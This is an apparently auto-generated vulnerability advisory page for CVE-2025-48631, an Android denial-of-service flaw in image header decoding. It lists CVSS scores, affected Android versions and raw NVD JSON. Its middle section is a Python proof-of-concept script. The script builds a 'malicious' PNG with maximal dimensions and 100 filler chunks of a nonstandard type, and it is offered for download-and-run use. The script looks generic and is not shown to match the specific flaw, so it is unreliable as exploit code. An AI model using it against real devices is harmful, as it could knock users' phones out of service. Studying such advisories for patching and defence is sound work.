Security Vulnerability Report
CVE-2025-48631 CVSS 6.5 MEDIUM

CVE-2025-48631

Published: 2025-12-08 17:16:19
Last Modified: 2026-03-06 04:16:00

Description

In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation.

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:* - VULNERABLE
cpe:2.3:o:google:android:16.0:qpr2_beta_1:*:*:*:*:*:* - VULNERABLE
Unpatched Android versions (security patch levels before March 1, 2026)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import struct
import zlib


def create_malicious_image():
    """
    Generate a malicious image file to trigger CVE-2025-48631.

    This PoC creates an image with malformed header to cause resource
    exhaustion in LocalImageResolver.java onHeaderDecoded method.
    """
    # PNG signature
    png_signature = b'\x89PNG\r\n\x1a\n'

    # Create malformed IHDR chunk with invalid dimensions
    # Width and Height set to extreme values to trigger resource exhaustion
    ihdr_data = struct.pack('>II', 0x7FFFFFFF, 0x7FFFFFFF)  # Max int dimensions
    ihdr_data += struct.pack('>BBBB', 8, 2, 0, 0)  # Bit depth, color type, compression, filter

    # Calculate CRC for IHDR chunk
    ihdr_type = b'IHDR'
    ihdr_crc = zlib.crc32(ihdr_type + ihdr_data) & 0xFFFFFFFF

    # Construct malformed PNG with repeated header data
    malicious_data = png_signature
    malicious_data += struct.pack('>I', len(ihdr_data))  # Length
    malicious_data += ihdr_type + ihdr_data
    malicious_data += struct.pack('>I', ihdr_crc)  # CRC

    # Add multiple malformed chunks to increase resource consumption
    for i in range(100):
        chunk_data = b'\x00' * 256
        chunk_crc = zlib.crc32(b'FLT\x00' + chunk_data) & 0xFFFFFFFF
        malicious_data += struct.pack('>I', len(chunk_data))
        malicious_data += b'FLT\x00' + chunk_data
        malicious_data += struct.pack('>I', chunk_crc)

    # Write malicious image file
    output_path = 'CVE-2025-48631_poc.png'
    with open(output_path, 'wb') as f:
        f.write(malicious_data)

    print(f'Malicious image created: {output_path}')
    print('This file can trigger resource exhaustion in Android LocalImageResolver')
    return output_path


if __name__ == '__main__':
    create_malicious_image()

References

https://source.android.com/docs/security/bulletin/2026/2026-03-01

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-48631", "sourceIdentifier": "[email protected]", "published": "2025-12-08T17:16:19.370", "lastModified": "2026-03-06T04:15:59.507", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "In onHeaderDecoded of LocalImageResolver.java, there is a possible persistent denial of service due to resource exhaustion. This could lead to remote denial of service with no additional execution privileges needed. User interaction is not needed for exploitation."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, {"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:13.0:*:*:*:*:*:*:*", "matchCriteriaId": "879FFD0C-9B38-4CAA-B057-1086D794D469"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:14.0:*:*:*:*:*:*:*", "matchCriteriaId": "2700BCC5-634D-4EC6-AB67-5B678D5F951D"}, 
{"vulnerable": true, "criteria": "cpe:2.3:o:google:android:15.0:*:*:*:*:*:*:*", "matchCriteriaId": "8538774C-906D-4B03-A3E7-FA7A55E0DA9E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:-:*:*:*:*:*:*", "matchCriteriaId": "02882AB1-7993-47DD-84A0-8DF4272D85ED"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:qpr2_beta_1:*:*:*:*:*:*", "matchCriteriaId": "FD695F32-4A73-4846-B1A1-04FF266E9C15"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:qpr2_beta_2:*:*:*:*:*:*", "matchCriteriaId": "3DE9F018-8704-476B-8D59-F63F8486E231"}, {"vulnerable": true, "criteria": "cpe:2.3:o:google:android:16.0:qpr2_beta_3:*:*:*:*:*:*", "matchCriteriaId": "BE95A642-4330-4F65-B028-3BA597D30F32"}]}]}], "references": [{"url": "https://source.android.com/docs/security/bulletin/2026/2026-03-01", "source": "[email protected]"}]}}